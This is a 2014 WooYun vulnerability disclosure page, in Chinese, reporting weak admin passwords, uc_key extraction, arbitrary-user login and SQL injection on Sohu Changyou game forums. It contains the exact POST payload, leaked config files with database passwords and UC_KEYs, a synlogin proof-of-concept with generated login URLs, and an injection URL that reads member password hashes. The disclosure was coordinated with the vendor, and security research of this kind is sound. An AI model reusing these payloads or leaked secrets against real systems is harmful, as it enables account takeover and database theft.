当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083253

漏洞标题:搜狐畅游多个论坛任意用户登陆及sql注入

相关厂商:搜狐畅游

漏洞作者: 路人甲

提交时间:2014-11-14 12:25

修复时间:2014-12-29 12:26

公开时间:2014-12-29 12:26

漏洞类型:后台弱口令

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-29: 细节向公众公开

简要描述:

搜狐畅游多个论坛任意用户登陆及sql注入
有些漏洞你以为你已经修复了,其实不然

详细说明:

http://bbs.eos.changyou.com/uc_server/admin.php 灵魂回响 弱口令:changyou.com
http://bbs.game.changyou.com/uc_server/admin.php 海战世界 弱口令:changyou.com
http://bbs.ffo.changyou.com/uc_server/admin.php 幻想神域 弱口令:changyou.com
uc_server/admin.php 做了限制
但可以通过接口获取uc_key
post data

m=app&a=add&ucfounder=&ucfounderpw=changyou.com&apptype=DISCUZX&appname=Discuz%21&appurl=http%3A%2F%2Fbbs.game.changyou.com&appip=&appcharset=gbk&appdbcharset=gbk&apptagtemplates[template]=%3Ca+href%3D%22%7Burl%7D%22+target%3D%22_blank%22%3E%7Bsubject%7D%3C%2Fa%3E&apptagtemplates[fields][subject]=%B1%EA%CC%E2&apptagtemplates[fields][uid]=%D3%C3%BB%A7+ID&apptagtemplates[fields][username]=%B7%A2%CC%FB%D5%DF&apptagtemplates[fields][dateline]=%C8%D5%C6%DA&apptagtemplates[fields][url]=%D6%F7%CC%E2%B5%D8%D6%B7&release=20110501


<?php
define('UC_CONNECT', '');
define('UC_DBHOST', '10.127.64.245');
define('UC_DBUSER', 'ffo');
define('UC_DBPW', 'newffobbs');
define('UC_DBNAME', 'ffo');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`ffo`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'abP223abK9d6weVdF8kameZfR3d207Xfu5VaG819EfS8v6Xbkcb5w6P8UfFfT5o0');
define('UC_API', 'http://bbs.ffo.changyou.com/uc_server');
define('UC_APPID', '1');
define('UC_IP', '111.206.12.60');
define('UC_PPP', 20);
?>


<?php
define('UC_CONNECT', '');
define('UC_DBHOST', '10.127.64.245');
define('UC_DBUSER', 'hz');
define('UC_DBPW', 'neweosbbs');
define('UC_DBNAME', 'discuz_hz');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`discuz_hz`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'yedbF1Y2Qc7aX6W5reH4Obs1lfAdE5b7xcifY5ydx1B681GbP79b8cP4v1ydBd1d');
define('UC_API', 'http://bbs.game.changyou.com/uc_server');
define('UC_APPID', '2');
define('UC_IP', '220.181.143.171');
define('UC_PPP', 20);
?>


<?php
define('UC_CONNECT', '');
define('UC_DBHOST', '10.127.64.245');
define('UC_DBUSER', 'eos');
define('UC_DBPW', 'neweosbbs');
define('UC_DBNAME', 'eos');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`eos`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'g1p34f7ec3ra6bw5q0y1t1H1D7S9Mamc735dS8FfQed7o5d4r3gb58EdB4Jaa6s4');
define('UC_API', 'http://bbs.eos.changyou.com/uc_server');
define('UC_APPID', '3');
define('UC_IP', '111.206.12.59');
define('UC_PPP', 20);
?>


appurl可以随便 我们要做的只是获取到任意一个uc_key即可 当然 如果填写已经存在的appurl 我们就能获得该应用的uc_key
获取到的uc_key(任意一个都可以)利用神器 我们可以知道uc_server里都有哪些app
如果填写已经存在的appurl 我们就能获得该应用的uc_key
当然 也可以做到登陆任意用户
poc关键代码:

$tmp = call_user_func(UC_API_FUNC, 'user', 'synlogin',array('uid'=>1));


<script type="text/javascript" src="http://test_bbs.eos.changyou.com/api/uc.php?time=1415937990&code=70a3%2Bu9gal4r9VHtgxjbmDJzLILxGKCnJn3MS4MKIw3ZLZQ6f%2FhaHsJfnHJersrfYw0rZ9t7mC6h1Ekk1M%2BgEETazULcp6bF2z2u5hjmAlmwtuDf38Js1l8x45ZIs1QdGvB0%2BgQO4ddpAEy0VhxZ26e7WikbKNvAdOKP" reload="1"></script><script type="text/javascript" src="http://127.0.0.1/api/uc.php?time=1415937990&code=5e71kqxil08bD8YIRoyHvGXwhySuZjw1BlALBbdu%2Fq7I8D74kUo5fM4GYovicRSR82jRSnib%2Bmwzd3x4eaQHt3FJkYZGVrXSfwU3ePwBN7tLfbWpse5uYql04ZQ4lS%2B2%2F%2F4ZA6872bwzl7%2F%2FUJ2ACrCTX5pjLhHUH8ij" reload="1"></script><script type="text/javascript" src="http://bbs.eos.changyou.com/api/uc.php?time=1415937990&code=5a14vEIwROWYgttKxFpTjFS7%2FZSHAIK4%2F5TrvMkc2T6TmsiIS5SUW%2B9kk6mVvpBTpInhwG70M0QvAX9%2BGiSvGCj%2FfJNtC8vbXd2AfS%2BIKhzTIGiZ5dOpq96c%2F2b%2FP1lBPIl67q9WQGMTofgI%2BxOOuosk1xJhfGF5xRqF" reload="1"></script>


测试发现

http://test_bbs.eos.changyou.com/api/uc.php?time=1415937990&code=70a3%2Bu9gal4r9VHtgxjbmDJzLILxGKCnJn3MS4MKIw3ZLZQ6f%2FhaHsJfnHJersrfYw0rZ9t7mC6h1Ekk1M%2BgEETazULcp6bF2z2u5hjmAlmwtuDf38Js1l8x45ZIs1QdGvB0%2BgQO4ddpAEy0VhxZ26e7WikbKNvAdOKP

才线上正在使用的应用
去掉【test_】 获得:

bbs.eos.changyou.com/api/uc.php?time=1415937990&code=70a3%2Bu9gal4r9VHtgxjbmDJzLILxGKCnJn3MS4MKIw3ZLZQ6f%2FhaHsJfnHJersrfYw0rZ9t7mC6h1Ekk1M%2BgEETazULcp6bF2z2u5hjmAlmwtuDf38Js1l8x45ZIs1QdGvB0%2BgQO4ddpAEy0VhxZ26e7WikbKNvAdOKP


同样方法 都可以登陆任意用户

漏洞证明:

C82FB01A-71A7-4DE3-9684-FF51C9157744.png

A98E6520-95CE-4596-B456-FAFA1B9D0273.png

0CEBC3F8-C11C-447D-8184-7B4630F60536.png


注入也是可以的

http://bbs.eos.changyou.com/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20statistic%20from%20pre_common_statuser,pre_ucenter_members%20as


8B33E110-A856-437E-81F2-B927CA4DD4E1.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-11-14 12:41

厂商回复:

谢谢,正在安排修复,非常感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-14 12:44 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @@ 5分?

  2. 2014-12-30 11:23 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @浩天 这里用的方法是不是和这个类似?利用技巧get百度某论坛数据库(数百万用户)